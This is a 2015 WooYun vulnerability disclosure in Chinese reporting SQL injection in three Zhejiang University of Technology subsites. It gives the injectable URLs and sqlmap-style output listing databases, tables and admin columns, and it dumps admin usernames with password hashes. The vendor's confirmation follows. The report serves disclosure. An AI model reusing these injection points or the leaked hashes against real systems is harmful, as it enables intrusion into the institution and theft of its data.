漏洞概要 关注数(24) 关注此漏洞
缺陷编号:wooyun-2015-0147354
漏洞标题:浙江工业大学三处分站GET注入打包提交
相关厂商:zjut.edu.cn
漏洞作者: 路人甲
提交时间:2015-10-18 18:38
修复时间:2015-12-03 11:22
公开时间:2015-12-03 11:22
漏洞类型:SQL注射漏洞
危害等级:高
自评Rank:20
漏洞状态:厂商已经确认
漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签: 无
漏洞详情
披露状态:
2015-10-18: 细节已通知厂商并且等待厂商处理中
2015-10-19: 厂商已经确认,细节仅向厂商公开
2015-10-29: 细节向核心白帽子及相关领域专家公开
2015-11-08: 细节向普通白帽子公开
2015-11-18: 细节向实习白帽子公开
2015-12-03: 细节向公众公开
简要描述:
RT
详细说明:
1.http://www.jxxyxnfz.zjut.edu.cn/Front/SearchList.aspx?type=
available databases [7]:
[*] HaikanOA
[*] master
[*] model
[*] msdb
[*] ReportServer
[*] ReportServerTempDB
[*] tempdb
web server operating system: Windows 2003
web application technology: ASP.NET 4.0.30319, ASP.NET, Microsoft IIS 6.0
back-end DBMS: Microsoft SQL Server 2008
[08:23:36] [INFO] fetching current database
current database: 'HaikanOA'
[08:26:07] [INFO] fetching tables for database: HaikanOA
[08:26:08] [INFO] the SQL query used returns 40 entries
[08:26:08] [INFO] retrieved: "dbo.achievement"
[08:26:08] [INFO] retrieved: "dbo.admin"
[08:26:08] [INFO] retrieved: "dbo.Answer"
[08:26:09] [INFO] retrieved: "dbo.AnswerScore"
[08:26:09] [INFO] retrieved: "dbo.ApplyProject"
[08:26:09] [INFO] retrieved: "dbo.ApplyStudent"
[08:26:10] [INFO] retrieved: "dbo.BBSPost"
[08:26:10] [INFO] retrieved: "dbo.BBSPostSon"
[08:26:10] [INFO] retrieved: "dbo.BBSReply"
[08:26:11] [INFO] retrieved: "dbo.Booking"
[08:26:11] [INFO] retrieved: "dbo.Courses"
[08:26:11] [INFO] retrieved: "dbo.CourseVideo"
[08:26:11] [INFO] retrieved: "dbo.Desk"
[08:26:12] [INFO] retrieved: "dbo.download"
[08:26:12] [INFO] retrieved: "dbo.FloatTable"
[08:26:12] [INFO] retrieved: "dbo.FridendlyLink"
....
Database: HaikanOA
Table: dbo.admin
[8 columns]
+--------------+----------+
| Column | Type |
+--------------+----------+
| id | int |
| lasttime | datetime |
| linestate | nvarchar |
| photo | nvarchar |
| roleid | int |
| truename | nvarchar |
| username | varchar |
| userpassword | varchar |
+--------------+----------+
Database: HaikanOA
Table: dbo.admin
[3 entries]
+-----------+----------------------------------+
| username | userpassword |
+-----------+----------------------------------+
| 100407101 | 4550D3832C5B130D |
| 100407102 | 4550D3832C5B130D |
| admin | AD41E5F6D383B8DEC533DCB0109FD9E8 |
+-----------+----------------------------------+
2.http://www.msexsgz.zjut.edu.cn/ShowNewsPageAction.do?newsID=622
available databases [5]:
[*] hcxsgz
[*] information_schema
[*] mysql
[*] test
[*] xsgz
web application technology: JSP
back-end DBMS: MySQL 5.0
[10:02:01] [INFO] fetching current database
[10:02:01] [INFO] retrieved: xsgz
current database: 'xsgz'
3.
http://www.ie.zjut.edu.cn/msc/index.php/Article/page?cid=18
http://www.ie.zjut.edu.cn/msc/index.php/Article/article2?cid=15
available databases [2]:
[*] iemsc
[*] information_schema
2和3数据就不继续跑了。
漏洞证明:
RT
修复方案:
做好过滤,另外一些容易猜解的后台入口修改一下。(如教师登录后台等等)
版权声明:转载请注明来源 路人甲@乌云
漏洞回应
厂商回应:
危害等级:中
漏洞Rank:7
确认时间:2015-10-19 11:22
厂商回复:
谢谢您的帮助
最新状态:
暂无